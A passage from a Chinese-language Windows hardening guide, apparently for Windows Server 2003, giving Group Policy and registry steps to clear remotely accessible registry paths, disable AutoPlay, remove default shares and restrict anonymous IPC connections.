将远程可访问的注册表路径设置为空,这样可以有效防止黑客利用扫描器通过远程注册表读取计算机的系统信息及其它信息。 打开组策略编辑器,依次展开“计算机配置-->Windows 设置-->安全设置-->本地策略-->安全选项”,在右侧窗口中找到“ 网络访问:可远程访问的注册表路径”,双击它,然后在打开的“ 网络访问:可远程访问的注册表路径 属性”窗口中,将可远程访问的注册表路径和子路径内容全部删除。四十九、 关闭自动播放功能 自动播放功能不仅对光驱起作用,而且对其它驱动器也起作用,这样很容易被黑客利用来执行黑客程序。 打开组策略编辑器,依次展开“计算机配置→管理模板→系统”,在右侧窗口中找到“关闭自动播放”选项并双击,在打开的对话框中选择“已启用”,然后在“关闭自动播放”后面的下拉菜单中选择“所有驱动器”,按“确定”即可生效。 五十、删除默认共享 单击“开始→运行”,输入“gpedit.msc”后回车,打开组策略编辑器。依次展开“用户配置→Windows 设置→脚本(登录/注销)”,双击登录项,然后添加“delshare.bat”(参数不需要添加),从而删除Windows 2003默认的共享。 接下来再禁用IPC连接:打开注册表编辑器,依次展开 [HKEY_ LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa ]分支,在右侧窗口中找到“restrictanonymous”子键,将其值改为“1”即可。